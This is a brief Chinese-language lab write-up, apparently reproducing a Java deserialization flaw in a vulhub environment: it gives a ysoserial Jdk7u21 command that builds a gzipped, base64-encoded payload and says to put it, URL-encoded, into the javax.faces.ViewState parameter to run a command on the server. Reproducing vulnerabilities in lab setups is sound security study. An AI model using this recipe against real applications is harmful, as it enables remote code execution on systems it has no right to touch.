漏洞复现 我们使用ysoserial的Jdk7u21利用链来生成一段payload: java -jar ysoserial.jar Jdk7u21 "touch /tmp/success" | gzip | base64 -w 0 我这里用的是vulhub的环境,访问your_ip:8080可以看到demo页面 抓包后修改javax.faces.ViewState的值为payload,payload记得要url编码 返回容器查看